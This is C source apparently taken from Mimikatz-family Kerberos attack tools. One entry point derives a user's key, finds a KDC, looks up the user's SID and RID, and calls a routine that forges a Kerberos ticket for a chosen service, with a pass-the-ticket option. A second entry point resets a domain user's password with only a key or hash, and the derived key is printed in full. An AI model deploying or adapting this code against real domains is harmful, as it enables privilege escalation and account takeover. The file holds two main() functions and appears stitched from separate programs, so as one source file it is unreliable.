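/*
 * Print the outcome carried in a kadmin/kpasswd reply octet string.
 *
 * data: the reply payload; its first two bytes are a big-endian 16-bit
 *       result code (0 = success), anything after them is dumped as hex
 *       without interpretation.
 *
 * Every byte of output goes through kprintf so it follows the program's
 * output handling like the rest of the function (the original ended with a
 * bare printf("\n"), which bypassed it).
 *
 * Only data->length is validated; the length comes from the reply and is
 * the sole bound applied to the reads below.
 */
void retFromKadmin(_octet1 * data)
{
	WORD code;

	if(data->length < 2)
	{
		PRINT_ERROR("Size\n");
		return;
	}
	/* assumes data->value is non-NULL whenever length >= 2 — confirm at the caller;
	   the wire code is big-endian, hence the byte swap before use */
	code = _byteswap_ushort(*(PWORD) data->value);
	if(code)
		kprintf("%s (%u)", kull_m_kadmin_passwd_err_to_string(code), code);
	else
		kprintf("OK");

	/* trailing bytes (if any) are shown raw; their meaning is not decoded here */
	if(data->length > 2)
	{
		kprintf(" - {");
		kull_m_string_printf_hex(data->value + 2, data->length - 2, 0);
		kprintf("}");
	}
	kprintf("\n");
}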
/*
 * Entry point: parse the command line, derive the user's Kerberos key,
 * locate a KDC and the user's SID/RID, then hand everything to makeInception().
 *
 * Arguments read (via kull_m_string_args_byName):
 *   target, service, user, domain  — required
 *   key | password                 — one required; key wins if both are given
 *   aes256 | aes128                — etype selectors, default is RC4-HMAC
 *   kdc                            — optional, otherwise DsGetDcName() is used
 *   sid, rid                       — optional pair, otherwise impersonateToGetData() fills them
 *   ptt | ticket                   — without ptt, the ticket filename defaults to TICKET_FILENAME
 *
 * Returns 0 unconditionally; failures are reported through PRINT_ERROR only,
 * so callers/scripts cannot rely on the exit status.
 */
int main(int argc, char * argv[])
{
	EncryptionKey userKey;
	LPCSTR szUser, szDomain, szTarget, szService, szPassword = NULL, szKey = NULL, szSid, szRid, szKdc = NULL, szFilename = NULL;
	PSID sid = NULL, domainSid = NULL;	/* domainSid is declared but never used below */
	DWORD ret, rid = 0;
	PDOMAIN_CONTROLLER_INFO cInfo = NULL;

	/* banner; string literals are kept exactly as in the original */
	kprintf("\n" " .#####. " MIMIKATZ_FULL "\n" " .## ^ ##. \n" " ## / \\ ## /* * *\n" " ## \\ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )\n" " '## v ##' http://blog.gentilkiwi.com (oe.eo)\n" " '#####' ... with thanks to Tom Maddock & Sylvain Monne * * */\n\n");
	if(init())
	{
		/* "ptt" suppresses file output; otherwise "ticket" (or TICKET_FILENAME) names the output file */
		if(!kull_m_string_args_byName(argc, argv, "ptt", NULL, NULL))
			kull_m_string_args_byName(argc, argv, "ticket", &szFilename, TICKET_FILENAME);
		if(kull_m_string_args_byName(argc, argv, "target", &szTarget, NULL))
		{
			if(kull_m_string_args_byName(argc, argv, "service", &szService, NULL))
			{
				if(kull_m_string_args_byName(argc, argv, "user", &szUser, NULL))
				{
					if(kull_m_string_args_byName(argc, argv, "domain", &szDomain, NULL))
					{
						/* short-circuit: when "key" is present, "password" is not even looked up */
						if(kull_m_string_args_byName(argc, argv, "key", &szKey, NULL) || kull_m_string_args_byName(argc, argv, "password", &szPassword, NULL))
						{
							if(kull_m_string_args_byName(argc, argv, "aes256", NULL, NULL))
								userKey.keytype = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96;
							else if(kull_m_string_args_byName(argc, argv, "aes128", NULL, NULL))
								userKey.keytype = KERB_ETYPE_AES128_CTS_HMAC_SHA1_96;
							else userKey.keytype = KERB_ETYPE_RC4_HMAC_NT;

							/* NOTE: a failure here is silent — no PRINT_ERROR on the else path */
							if(NT_SUCCESS(kull_m_kerberos_asn1_helper_util_stringToKey(szUser, szDomain, szPassword, szKey, &userKey)))
							{
								if(!kull_m_string_args_byName(argc, argv, "kdc", &szKdc, NULL))
								{
									ret = DsGetDcName(NULL, szDomain, NULL, NULL, DS_IS_DNS_NAME | DS_RETURN_DNS_NAME, &cInfo);
									if(ret == ERROR_SUCCESS)
									{
										/* + 2 skips the leading "\\" of the returned DC name; szKdc now aliases cInfo, freed below */
										szKdc = cInfo->DomainControllerName + 2;
										kprintf("[KDC] \'%s\' will be the main server\n", szKdc);
									}
									else PRINT_ERROR("[KDC] DsGetDcName: %u\n", ret);
								}
								if(szKdc)
								{
									if(kull_m_string_args_byName(argc, argv, "sid", &szSid, NULL) && kull_m_string_args_byName(argc, argv, "rid", &szRid, NULL))
									{
										/* strtoul with no endptr/errno check: unparsable "rid" yields 0, which
										   the (sid && rid) test below treats as "not supplied" */
										if(ConvertStringSidToSid(szSid, &sid))
											rid = strtoul(szRid, NULL, 0);
										else PRINT_ERROR_AUTO("ConvertStringSidToSid");
									}
									if(!(sid && rid))
									{
										/* fallback lookup of SID/RID; only possible with a cleartext password */
										if(szPassword)
										{
#pragma warning(push)
#pragma warning(disable:4996)	/* _pgmptr is deprecated */
											impersonateToGetData(szUser, szDomain, szPassword, szKdc,&sid, &rid, _pgmptr);
#pragma warning(pop)
										}
										else PRINT_ERROR("Impersonate is only supported with a password (you need KDC, SID & RID)\n");
									}
									if(sid && rid)
									{
										/* the password itself is never echoed; "<NULL>" means a key was supplied instead */
										kprintf("\n" "user : %s\n" "domain : %s\n" "password : %s\n" "sid : " , szUser, szDomain, szKey ? "<NULL>" : "***");
										kull_m_string_displaySID(sid);
										kprintf("\n" "target : %s\n" "service : %s\n" "rid : %u\n" "key : " , szTarget, szService, rid);
										/* the derived key material is printed in full here */
										kull_m_string_printf_hex(userKey.keyvalue.value, userKey.keyvalue.length, 0);
										kprintf(" (%s)\n" "ticket : %s\n" , kull_m_kerberos_asn1_helper_util_etypeToString(userKey.keytype), szFilename ? szFilename : "** Pass The Ticket **");
										/* szKdc was already tested non-NULL above; this else branch is unreachable */
										if(szKdc)
										{
											kprintf("kdc : %s\n\n", szKdc);
											makeInception(szUser, szDomain, sid, rid, szTarget, szService, &userKey, szKdc, 88, szFilename);
										}
										else PRINT_ERROR("No KDC at all\n");
										/* sid came from ConvertStringSidToSid or impersonateToGetData; assumed LocalAlloc-owned in both cases */
										LocalFree(sid);
									}
									else PRINT_ERROR("Missing valid SID & RID (argument or auto)\n");
								}
								else PRINT_ERROR("Missing one valid DC (argument or auto)\n");
								if(cInfo)
									NetApiBufferFree(cInfo);
								/* key bytes are released but not zeroized before free */
								LocalFree(userKey.keyvalue.value);
							}
						}
						else PRINT_ERROR("Missing password/key argument\n");
					}
					else PRINT_ERROR("Missing domain argument\n");
				}
				else PRINT_ERROR("Missing user argument\n");
			}
			else PRINT_ERROR("Missing service argument\n");
		}
		else PRINT_ERROR("Missing target argument\n");
	}
	else PRINT_ERROR("init() failed\n");
	term();
	return 0;
}
/*
 * Entry point: parse the command line, derive the user's Kerberos key,
 * locate a KDC for the domain and call makeInception() with the new password.
 *
 * Arguments read (via kull_m_string_args_byName):
 *   user, domain, new     — required
 *   key | password        — one required; key wins if both are given
 *   aes256 | aes128       — etype selectors, default is RC4-HMAC
 *
 * Returns 0 unconditionally; failures are reported through PRINT_ERROR only.
 * Note that credentials (password/key and the new password) are taken from
 * argv and are therefore visible in process listings on the host.
 */
int main(int argc, char * argv[])
{
	EncryptionKey userKey;
	LPCSTR szUser, szDomain, szPassword = NULL, szKey = NULL, szNew;
	LPSTR szWhatDC;

	/* banner; string literals are kept exactly as in the original */
	kprintf("\n" " .#####. " MIMIKATZ_FULL "\n" " .## ^ ##. " MIMIKATZ_SECOND "\n" " ## / \\ ## /* * *\n" " ## \\ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )\n" " '## v ##' http://blog.gentilkiwi.com (oe.eo)\n" " '#####' ... with thanks to Aorato / Microsoft ... * * */\n\n");
	if(init())
	{
		if(kull_m_string_args_byName(argc, argv, "user", &szUser, NULL))
		{
			if(kull_m_string_args_byName(argc, argv, "domain", &szDomain, NULL))
			{
				/* short-circuit: when "key" is present, "password" is not even looked up */
				if(kull_m_string_args_byName(argc, argv, "key", &szKey, NULL) || kull_m_string_args_byName(argc, argv, "password", &szPassword, NULL))
				{
					if(kull_m_string_args_byName(argc, argv, "aes256", NULL, NULL))
						userKey.keytype = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96;
					else if(kull_m_string_args_byName(argc, argv, "aes128", NULL, NULL))
						userKey.keytype = KERB_ETYPE_AES128_CTS_HMAC_SHA1_96;
					else userKey.keytype = KERB_ETYPE_RC4_HMAC_NT;

					if(kull_m_string_args_byName(argc, argv, "new", &szNew, NULL))
					{
						/* NOTE: a failure here is silent — no PRINT_ERROR on the else path */
						if(NT_SUCCESS(kull_m_kerberos_asn1_helper_util_stringToKey(szUser, szDomain, szPassword, szKey, &userKey)))
						{
							/* likewise silent when no DC is found; szWhatDC is only valid inside this block */
							if(kull_m_kerberos_helper_net_getDC(szDomain, DS_KDC_REQUIRED, &szWhatDC))
							{
								/* the password itself is never echoed; "<NULL>" means a key was supplied instead */
								kprintf("[KDC] \'%s\' will be the main server\n\n" "user : %s\n" "domain : %s\n" "password : %s\n" "key : " , szWhatDC, szUser, szDomain, szKey ? "<NULL>" : "***");
								/* the derived key material is printed in full here */
								kull_m_string_printf_hex(userKey.keyvalue.value, userKey.keyvalue.length, 0);
								kprintf(" (%s)\n", kull_m_kerberos_asn1_helper_util_etypeToString(userKey.keytype));
								/* 88 and 464 are passed as ports; their exact roles are defined by makeInception, not here */
								makeInception(szUser, szDomain, szNew, &userKey, szWhatDC, 88, 464);
								LocalFree(szWhatDC);
							}
							/* key bytes are released but not zeroized before free */
							LocalFree(userKey.keyvalue.value);
						}
					}
					else PRINT_ERROR("Missing new password\n");
				}
				else PRINT_ERROR("Missing password/key argument\n");
			}
			else PRINT_ERROR("Missing domain argument\n");
		}
		else PRINT_ERROR("Missing user argument\n");
	}
	else PRINT_ERROR("init() failed\n");
	term();
	return 0;
}